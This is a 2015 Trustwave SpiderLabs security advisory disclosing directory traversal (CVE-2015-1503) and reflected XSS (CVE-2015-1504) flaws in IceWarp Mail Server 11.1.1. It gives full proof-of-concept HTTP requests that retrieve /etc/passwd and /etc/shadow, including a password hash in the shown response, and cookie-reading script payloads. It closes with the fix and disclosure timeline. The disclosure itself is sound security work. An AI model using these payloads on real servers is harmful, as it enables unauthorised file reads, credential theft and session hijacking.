Trustwave SpiderLabs Security Advisory TWSL2015-001:
Multiple Vulnerabilities in IceWarp Mail Server

Published: 02/12/15
Version: 1.0

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 11.1.1 and below

Product description: 
IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.

Finding 1: Multiple Unauthenticated Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1503
CWE: CWE-22

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET request to the
/webmail/client/skins/default/css/css.php. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

This vulnerability affects /-.._._.--.._1416610368(variable, depending on
the installation, need to check page
source)/webmail/client/skins/default/css/css.php.

Attack details
URL GET input file was set to ../../../../../../../../../../etc/passwd

Proof-of-Concept:

The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:

REQUEST
=======
GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


RESPONSE:
=========
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 

....TRUNCATED

test:x:1000:1000:test,,,:/home/test:/bin/bash 
smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false 
smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false 
mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false 

The above proof-of-concept would retrieve the /etc/passwd file (the
response in this example has been truncated).

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET and POST request payload
..././..././..././..././..././..././..././..././..././..././etc/shadow
submitted in the script and/or style parameter.  Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

The script and style parameters are vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.

REQUEST 1
=========

GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

REQUEST 2
=========

GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

RESPONSE
========
HTTP/1.1 200 OK
Connection: close
Server: IceWarp/11.1.1.0
Date: Thu, 03 Jan 2015 06:44:23 GMT
Content-type: text/javascript; charset=utf-8

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::

....TRUNCATED

lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::




Finding 2: Authenticated Reflected Cross-Site Scripting (XSS)
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1504
CWE: CWE-79

#Proof of Concept

This vulnerability affects /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php. 

URL GET input file was set to obj_loader.css'"()&%<script>prompt("XSS”)</script>

GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=obj_loader.css%27%22%28%29%26%25%3Cscript%3Eprompt%28%22XSS%22%29%3C/script%3E&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


#Proof of Concept
	
This vulnerability affects /webmail/basic/index.html. 

URL POST input type was set to M'"()&%<test><script>prompt(document.cookie)</script>

GET /webmail/basic/index.html?_l=folder&p0=main&p1=content&p2=mail.main&p3=item.fdr&p4=INBOX&p5=M'"()&%<test><script>prompt(document.cookie)</script>&_s[search]=&_s[page]=1 HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54ab21b636125152873406; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Host: a.b.c.d


#Proof of Concept

This vulnerability affects /webmail/basic/index.html. 

URL GET input p5 was set to E'"()&%<test><script>prompt(document.cookie)</script>

GET /webmail/basic/index.html?p0=main&p1=content&p2=event.main&p3=item.fdr&p4=Calendar&p5=E'"()&%<test><script>prompt(document.cookie)</script>&_l=folder&_n[p][main]=win.main.tree HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54ab21b636125152873406; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


Remediation Steps:
Upgrade to version v11.1.2 or the latest stable version of IceWarp Mail
Server. Please note that Trustwave SpiderLabs have not verified this fix.


Revision History:
01/06/15 - Vulnerability disclosed to vendor
01/14/15 - Patch released by vendor
02/12/15 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce
security risks. With cloud and managed security services, integrated
technologies and a team of security experts, ethical hackers and
researchers, Trustwave enables businesses to transform the way they manage
their information security and compliance programs while safely embracing
business imperatives including big data, BYOD and social media. More than
2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud
platform, through which Trustwave delivers automated, efficient and
cost-effective data protection, risk management and threat intelligence.
Trustwave is a privately held company, headquartered in Chicago, with
customers in 96 countries. For more information about Trustwave, visit
www.trustwave.com.

About Trustwave's SpiderLabs: SpiderLabs is the advance security team at
Trustwave responsible for incident response and forensics, ethical hacking
and application security tests for Trustwave's clients. SpiderLabs has
responded to hundreds of security incidents, performed thousands of ethical
hacking exercises and tested the security of hundreds of business
applications for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs

Disclaimer: The information provided in this advisory is provided "as is"
without warranty of any kind. Trustwave disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness
for a particular purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.